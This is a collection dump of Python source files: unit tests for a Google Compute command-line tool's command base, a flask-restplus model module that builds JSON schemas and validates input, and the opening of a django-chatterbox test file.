flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
command_base.sys.exit = CommandBaseTest.FakeExit()
sys.stderr = CommandBaseTest.CaptureOutput()
gcutil_logging.SetupLogging()
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptExtraArgs(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1', 'arg2', 'arg3']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
command_base.sys.exit = CommandBaseTest.FakeExit()
sys.stderr = CommandBaseTest.CaptureOutput()
gcutil_logging.SetupLogging()
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptNo(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
mock_input = mock_api.MockInput('garbage\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Take scary action? [y/N]\n>>> ')
self.assertEqual(result, False)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptForce(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command', '--force']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
sys.stdout = oldout
self.assertEqual(result, True)
self.assertEqual(mock_output.GetCapturedText(), '')
def testPromptForEntryWithZeroItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection'
})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
self.assertEqual(
command._PromptForEntry(MockCollectionApi(), 'collection'),
None)
def testPromptForEntryWithOneItem(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1'}]
})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
# Tests _PromptForEntry with auto selecting on.
self.assertEqual(command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=True),
{'name': 'item-1'})
# Tests _PromptForEntry with auto selecting off.
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('1\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(mock_output.GetCapturedText(),
'1: item-1\n>>> ')
self.assertEqual(result, {'name': 'item-1'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithManyItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1'},
{'name': 'item-2'},
{'name': 'item-3'},
{'name': 'item-4'}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join(('1: item-1', '2: item-2', '3: item-3', '4: item-4', '>>> ')))
self.assertEqual(result, {'name': 'item-3'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithManyItemsAndAdditionalKeyFunc(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None,
pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#machineTypeList',
'id': 'projects/p/machineTypes',
'selfLink': ('https://www.googleapis.com/compute/v1/projects/p/'
'machineTypes'),
'items': [{'name': 'n1-highcpu-4-d'},
{'name': 'n1-standard-2'},
{'name': 'n1-standard-1-d'},
{'name': 'n1-standard-8-d'},
{'name': 'n1-highcpu-8-d'},
{'name': 'n1-standard-2-d'},
{'name': 'n1-standard-1'},
{'name': 'n1-standard-4'},
{'name': 'n1-highmem-4'},
{'name': 'n1-highcpu-4'},
{'name': 'n1-highcpu-2'},
{'name': 'n1-standard-4-d'},
{'name': 'n1-standard-8'},
{'name': 'n1-highmem-2'},
{'name': 'n1-highmem-2-d'},
{'name': 'n1-highcpu-2-d'},
{'name': 'n1-highmem-8'},
{'name': 'n1-highcpu-8'},
{'name': 'n1-highmem-8-d'},
{'name': 'n1-highmem-4-d'}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(
MockCollectionApi(), 'machine type', auto_select=False,
additional_key_func=command._GetMachineTypeSecondarySortScore)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join((
'1: n1-standard-1',
'2: n1-standard-1-d',
'3: n1-standard-2',
'4: n1-standard-2-d',
'5: n1-standard-4',
'6: n1-standard-4-d',
'7: n1-standard-8',
'8: n1-standard-8-d',
'9: n1-highcpu-2',
'10: n1-highcpu-2-d',
'11: n1-highcpu-4',
'12: n1-highcpu-4-d',
'13: n1-highcpu-8',
'14: n1-highcpu-8-d',
'15: n1-highmem-2',
'16: n1-highmem-2-d',
'17: n1-highmem-4',
'18: n1-highmem-4-d',
'19: n1-highmem-8',
'20: n1-highmem-8-d',
'>>> ')))
self.assertEqual(result, {'name': 'n1-standard-2'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithDeprecatedItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1',
'deprecated':
{'state': 'DEPRECATED'}},
{'name': 'item-2'},
{'name': 'item-3',
'deprecated':
{'state': 'OBSOLETE'}},
{'name': 'item-4'},
{'name': 'item-5',
'deprecated':
{'state': 'DEPRECATED'}},
{'name': 'item-6',
'deprecated':
{'state': 'DELETED'}}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join(('1: item-2', '2: item-4', '3: item-1 (DEPRECATED)',
'4: item-5 (DEPRECATED)', '>>> ')))
self.assertEqual(result, {'name': 'item-1', 'deprecated':
{'state': 'DEPRECATED'}})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForChoicesWithOneDeprecatedItem(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1',
'deprecated':
{'state': 'DEPRECATED'}}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection')
self.assertEqual(
mock_output.GetCapturedText(),
'Selecting the only available collection: item-1\n')
self.assertEqual(result, {'name': 'item-1', 'deprecated':
{'state': 'DEPRECATED'}})
sys.stdout = oldout
def testDetailOutput(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.MockDetailCommand('mock_command', flag_values)
expected_output = (u'+-------------+-------------+\n'
'| property | value |\n'
'+-------------+-------------+\n'
'| name | my-object-c |\n'
'| id | 123 |\n'
'| description | Object C |\n'
'| additional | foo |\n'
'+-------------+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testEmptyList(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
class ListEmptyMockCommand(CommandBaseTest.ListMockCommand):
def __init__(self, name, flag_values):
super(ListEmptyMockCommand, self).__init__(name, flag_values)
def Handle(self):
return {'kind': 'cloud#objectsList'}
command = ListEmptyMockCommand('empty_list', flag_values)
expected_output = (u'+------+----+-------------+\n'
'| name | id | description |\n'
'+------+----+-------------+\n'
'+------+----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingNone(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommandBase('mock_command', flag_values)
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingDefault(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingSpecifiedInAscendingOrder(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
flag_values.sort_by = 'id'
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingSpecifiedInDescendingOrder(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
flag_values.sort_by = '-id'
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-d | 999 | Object D |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-c | 123 | Object C |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testGracefulHandlingOfInvalidDefaultSortField(self):
class ListMockCommandWithBadDefaultSortField(
CommandBaseTest.ListMockCommandBase):
default_sort_field = 'bad-field-name'
def __init__(self, name, flag_values):
super(ListMockCommandWithBadDefaultSortField, self).__init__(
name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = ListMockCommandWithBadDefaultSortField(
'mock_command', flag_values)
# The output is expected to remain unsorted if the default sort
# field is invalid.
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testVersionComparison(self):
class MockCommand(CommandBaseTest.ListMockCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
command.supported_versions = ['v1beta2', 'v1beta3', 'v1beta4',
'v1beta5', 'v1beta6']
flag_values.service_version = 'v1beta4'
command.SetFlags(flag_values)
self.assertFalse(command._IsUsingAtLeastApiVersion('v1beta6'))
self.assertFalse(command._IsUsingAtLeastApiVersion('v1beta5'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta4'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta2'))
flag_values.service_version = 'v1beta6'
command.SetFlags(flag_values)
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta6'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta5'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta4'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta2'))
def testTracing(self):
class MockComputeApi(object):
def __init__(self, trace_calls):
self._trace_calls = trace_calls
def Disks(self):
class MockDisksApi(object):
def __init__(self, trace_calls):
self._trace_calls = trace_calls
def Insert(self, trace=None):
if trace:
self._trace_calls.append(trace)
return MockDisksApi(self._trace_calls)
# Expect no tracing if flag is not set.
trace_calls = []
compute = command_base.GoogleComputeCommand.WrapApiIfNeeded(
MockComputeApi(trace_calls))
compute.Disks().Insert()
self.assertEqual(0, len(trace_calls))
# Expect tracing if trace_token flag is set.
trace_calls = []
FLAGS.trace_token = 'THE_TOKEN'
compute = command_base.GoogleComputeCommand.WrapApiIfNeeded(
MockComputeApi(trace_calls))
compute.Disks().Insert()
self.assertEqual(1, len(trace_calls))
self.assertEqual('token:THE_TOKEN', trace_calls[0])
FLAGS.trace_token = ''
def testWaitForOperation(self):
complete_name = 'operation-complete'
running_name = 'operation-running'
pending_name = 'operation-pending'
stuck_name = 'operation-stuck'
base_operation = {'kind': 'cloud#operation',
'targetLink': ('https://www.googleapis.com/compute/'
'v1beta100/projects/p/instances/i1'),
'operationType': 'insert'}
completed_operation = dict(base_operation)
completed_operation.update({'name': complete_name,
'status': 'DONE'})
running_operation = dict(base_operation)
running_operation.update({'name': running_name,
'status': 'RUNNING'})
pending_operation = dict(base_operation)
pending_operation.update({'name': pending_name,
'status': 'PENDING'})
stuck_operation = dict(base_operation)
stuck_operation.update({'name': stuck_name,
'status': 'PENDING'})
next_operation = {complete_name: completed_operation,
running_name: completed_operation,
pending_name: running_operation,
stuck_name: stuck_operation}
class MockHttpResponse(object):
def __init__(self, status, reason):
self.status = status
self.reason = reason
class MockHttp(object):
def request(self_, url, method='GET', body=None, headers=None):
response = MockHttpResponse(200, 'OK')
data = '{ "kind": "compute#instance", "name": "i1" }'
return response, data
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
def CreateHttp(self):
return MockHttp()
class MockTimer(object):
def __init__(self):
self._current_time = 0
def time(self):
return self._current_time
def sleep(self, time_to_sleep):
self._current_time += time_to_sleep
return self._current_time
class LocalMockOperationsApi(object):
def __init__(self):
self._get_call_count = 0
def GetCallCount(self):
return self._get_call_count
def get(self, project='unused project', operation='operation'):
unused_project = project
self._get_call_count += 1
return mock_api.MockRequest(next_operation[operation])
flag_values = copy.deepcopy(FLAGS)
flag_values.sleep_between_polls = 1
flag_values.max_wait_time = 30
flag_values.service_version = 'v1beta13'
flag_values.synchronous_mode = False
flag_values.project = 'test'
# Ensure a synchronous result returns immediately.
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
diskResult = {'kind': 'cloud#disk'}
result = command.WaitForOperation(flag_values, timer, diskResult)
self.assertEqual(0, command._global_operations_api.GetCallCount())
# Ensure an asynchronous result loops until complete.
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
result = command.WaitForOperation(flag_values, timer, pending_operation)
self.assertEqual(2, command._global_operations_api.GetCallCount())
# Ensure an asynchronous result eventually times out
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
result = command.WaitForOperation(flag_values, timer, stuck_operation)
self.assertEqual(30, command._global_operations_api.GetCallCount())
self.assertEqual(result['status'], 'PENDING')
def testBuildComputeApi(self):
"""Ensures that building of the API from the discovery succeeds."""
flag_values = copy.deepcopy(FLAGS)
command = command_base.GoogleComputeCommand('test_cmd', flag_values)
command._BuildComputeApi(None)
def testGetZone(self):
zones = {
'zone-a': {
'kind': 'compute#zone',
'id': '1',
'creationTimestamp': '2011-07-27T20:04:06.171',
'selfLink': (
'https://googleapis.com/compute/v1/projects/p/zones/zone-a'),
'name': 'zone-a',
'description': 'Zone zone/a',
'status': 'UP'},
'zone-b': {
'kind': 'compute#zone',
'id': '2',
'creationTimestamp': '2012-01-12T00:20:42.057',
'selfLink': (
'https://googleapis.com/compute/v1/projects/p/zones/zone-b'),
'name': 'zone-b',
'description': 'Zone zone/b',
'status': 'UP',
'maintenanceWindows': [
{
'name': '2012-06-24-planned-outage',
'description': 'maintenance zone',
'beginTime': '2012-06-24T07:00:00.000',
'endTime': '2012-07-08T07:00:00.000'
}
]
}
}
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
class MockZonesApi(object):
def get(self, zone, **unused_kwargs):
return mock_api.MockRequest(zones[zone])
def _PromptForZone():
return zones['zone-a']
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
flag_values.project = 'p'
command.SetFlags(flag_values)
command._zones_api = MockZonesApi()
command._PromptForZone = _PromptForZone
self.assertEqual(command._GetZone('zone-a'), 'zone-a')
self.assertEqual(command._GetZone('zone-b'), 'zone-b')
self.assertEqual(command._GetZone(None), 'zone-a')
def testGetNextMaintenanceStart(self):
zone = {
'kind': 'compute#zone',
'name': 'zone',
'maintenanceWindows': [
{
'name': 'january',
'beginTime': '2013-01-01T00:00:00.000',
'endTime': '2013-01-31T00:00:00.000'
},
{
'name': 'march',
'beginTime': '2013-03-01T00:00:00.000',
'endTime': '2013-03-31T00:00:00.000'
},
]
}
gnms = command_base.GoogleComputeCommand._GetNextMaintenanceStart
start = gnms(zone, datetime.datetime(2012, 12, 1))
self.assertEqual(start, datetime.datetime(2013, 1, 1))
start = gnms(zone, datetime.datetime(2013, 2, 14))
self.assertEqual(start, datetime.datetime(2013, 3, 1))
start = gnms(zone, datetime.datetime(2013, 3, 15))
self.assertEqual(start, datetime.datetime(2013, 3, 1))
def testGetZoneForResource(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'google'
flag_values.project = expected_project
flag_values.service_version = 'v1beta13'
class MockCommand(command_base.GoogleComputeCommand):
resource_collection_name = 'foos'
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_string('zone',
None,
'Zone name.',
flag_values=flag_values)
self.params = None
def RunWithFlagsAndPositionalArgs(self, flag_values, pos_arg_values):
if self._flags != flag_values:
raise RuntimeError('Flags mismatch')
self.Handle(*pos_arg_values)
def Handle(self, param1, param2):
self.params = (param1, param2)
return None
class MockApi(object):
list_response = None
def __init__(self):
pass
def list(self, **kwargs):
self.list_parameters = kwargs
return self.list_response
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'zone1'}]})
command = MockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
api = MockApi()
command.SetFlags(flag_values)
# Project-qualified name.
self.assertEqual(
command.GetZoneForResource(None, 'projects/foo/zones/bar'), 'bar')
# Special 'global' zone.
flag_values.zone = 'global'
command.SetFlags(flag_values)
self.assertEqual(
command.GetZoneForResource(None, command_base.GLOBAL_ZONE_NAME),
None)
# Zone name explicitly set.
flag_values.zone = 'explicitly-set-zone'
command.SetFlags(flag_values)
self.assertEqual(
command.GetZoneForResource(None, 'some-resource'),
'explicitly-set-zone')
def testGetUsageWithPositionalArgs(self):
class MockCommand(command_base.GoogleComputeCommand):
positional_args = '<arg-1> ... <arg-n>'
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
self.assertTrue(command._GetUsage().endswith(
' [--global_flags] mock_command [--command_flags] <arg-1> ... <arg-n>'))
def testGetUsageWithNoPositionalArgs(self):
class MockCommand(command_base.GoogleComputeCommand):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
self.assertTrue(command._GetUsage().endswith(
' [--global_flags] mock_command [--command_flags]'))
def testGoogleComputeListCommandPerZone(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'foo'
flag_values.project = expected_project
flag_values.service_version = 'v1beta14'
object_a = {'description': 'Object A',
'id': 'projects/user/zones/a/objects/my-object-a',
'kind': 'cloud#object'}
object_b = {'description': 'Object B',
'id': 'projects/user/zones/b/objects/my-object-b',
'kind': 'cloud#object'}
list_a = {'items': [object_a],
'kind': 'cloud#objectList'}
list_b = {'items': [object_b],
'kind': 'cloud#objectList'}
list_all = {'items': [object_a, object_b],
'kind': 'cloud#objectList'}
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'a'},
{'name': 'b'}]})
class ZoneListMockCommand(CommandBaseTest.ListMockCommandBase):
"""A list mock command that represents a zone-scoped collection."""
is_global_level_collection = False
is_zone_level_collection = True
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(name,
flag_values)
flags.DEFINE_string('zone',
None,
'The zone to list.',
flag_values=flag_values)
def ListZoneFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None,
zone=None):
if zone == 'a':
return mock_api.MockRequest(list_a)
else:
return mock_api.MockRequest(list_b)
return Func
command = ZoneListMockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
# Test single zone
flag_values.zone = 'a'
command.SetFlags(flag_values)
self.assertEqual(list_a, command.Handle())
# Test all zones
flag_values.zone = None
command.SetFlags(flag_values)
self.assertEqual(list_all, command.Handle())
def testGoogleComputeListCommandZoneAndGlobal(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'foo'
flag_values.project = expected_project
flag_values.service_version = 'v1beta14'
object_a = {'description': 'Object A',
'id': 'projects/user/zones/a/objects/my-object-a',
'kind': 'cloud#object'}
object_b = {'description': 'Object B',
'id': 'projects/user/zones/b/objects/my-object-b',
'kind': 'cloud#object'}
object_c = {'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object'}
list_global = {'items': [object_c],
'kind': 'cloud#objectList'}
list_a = {'items': [object_a],
'kind': 'cloud#objectList'}
list_b = {'items': [object_b],
'kind': 'cloud#objectList'}
list_all = {'items': [object_c, object_a, object_b],
'kind': 'cloud#objectList'}
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'a'},
{'name': 'b'}]})
    class GlobalAndZoneListMockCommand(CommandBaseTest.ListMockCommandBase):
      """A list mock command that represents a global and zone-scoped collection."""
is_global_level_collection = True
is_zone_level_collection = True
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(name,
flag_values)
flags.DEFINE_string('zone',
None,
'The zone to list.',
flag_values=flag_values)
def ListZoneFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None,
zone=None):
if zone == 'a':
return mock_api.MockRequest(list_a)
else:
return mock_api.MockRequest(list_b)
return Func
def ListFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(list_global)
return Func
command = GlobalAndZoneListMockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
# Test single zone
flag_values.zone = 'a'
command.SetFlags(flag_values)
self.assertEqual(list_a, command.Handle())
# Test 'global' zone
flag_values.zone = 'global'
command.SetFlags(flag_values)
self.assertEqual(list_global, command.Handle())
# Test all
flag_values.zone = None
command.SetFlags(flag_values)
self.assertEqual(list_all, command.Handle())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 6,162,142,385,594,868,000 | 34.151423 | 81 | 0.577669 | false |
luminusnetworks/flask-restplus | flask_restplus/model.py | 1 | 3749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import re
from collections import MutableMapping
from six import iteritems, itervalues
from werkzeug import cached_property
from flask.ext.restful import abort
from jsonschema import Draft4Validator
from jsonschema.exceptions import ValidationError
from .utils import not_none
RE_REQUIRED = re.compile(r'u?\'(?P<name>.*)\' is a required property', re.I | re.U)
def instance(cls):
if isinstance(cls, type):
return cls()
return cls
class ApiModel(dict, MutableMapping):
'''A thin wrapper on dict to store API doc metadata'''
def __init__(self, *args, **kwargs):
self.__apidoc__ = {}
self.__parent__ = None
super(ApiModel, self).__init__(*args, **kwargs)
@cached_property
def resolved(self):
'''
Resolve real fields before submitting them to upstream restful marshal
'''
# Duplicate fields
resolved = copy.deepcopy(self)
# Recursively copy parent fields if necessary
if self.__parent__:
resolved.update(self.__parent__.resolved)
# Handle discriminator
candidates = [f for f in itervalues(resolved) if getattr(f, 'discriminator', None)]
        # Ensure there is only one discriminator
if len(candidates) > 1:
raise ValueError('There can only be one discriminator by schema')
        # Ensure the discriminator always outputs the model name
elif len(candidates) == 1:
candidates[0].default = self.__apidoc__['name']
return resolved
@property
def ancestors(self):
'''
Return the ancestors tree
'''
return self.__parent__.tree
@cached_property
def tree(self):
'''
Return the inheritance tree
'''
tree = [self.__apidoc__['name']]
return self.ancestors + tree if self.__parent__ else tree
@property
def name(self):
return self.__apidoc__['name']
def get_parent(self, name):
if self.name == name:
return self
elif self.__parent__:
return self.__parent__.get_parent(name)
else:
raise ValueError('Parent ' + name + ' not found')
@cached_property
def __schema__(self):
properties = {}
required = set()
discriminator = None
for name, field in iteritems(self):
field = instance(field)
properties[name] = field.__schema__
if field.required:
required.add(name)
if getattr(field, 'discriminator', False):
discriminator = name
schema = not_none({
'required': sorted(list(required)) or None,
'properties': properties,
'discriminator': discriminator,
})
if self.__parent__:
return {
'allOf': [
{'$ref': '#/definitions/{0}'.format(self.__parent__.name)},
schema
]
}
else:
return schema
def validate(self, data, resolver=None):
validator = Draft4Validator(self.__schema__, resolver=resolver)
try:
validator.validate(data)
except ValidationError:
abort(400, message='Input payload validation failed',
errors=dict(self.format_error(e) for e in validator.iter_errors(data)))
def format_error(self, error):
path = list(error.path)
if error.validator == 'required':
name = RE_REQUIRED.match(error.message).group('name')
path.append(name)
key = '.'.join(str(p) for p in path)
return key, error.message
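# Illustrative sketch (not part of the original module): roughly how an
# ApiModel is used. The field class and names below are assumptions for
# illustration only; real instances are normally built through the Api
# helpers rather than by hand.
#
#   model = ApiModel(name=fields.String(required=True))
#   model.__apidoc__['name'] = 'Person'
#   model.__schema__            # -> JSON schema listing 'name' as required
#   model.validate({'age': 1})  # -> aborts the request with HTTP 400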
| mit | 9,132,711,310,193,059,000 | 28.289063 | 91 | 0.572153 | false |
sthzg/django-chatterbox | chatterbox/tests/test_events.py | 1 | 3069 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.test.testcases import SimpleTestCase
from chatterbox.events import BaseChatterboxEvent
from .helpers import MailEventDummyClass, get_test_dict
class BaseChatterboxTests(SimpleTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_add_template(self):
""" ``add_template()`` stores passed values as expected.
"""
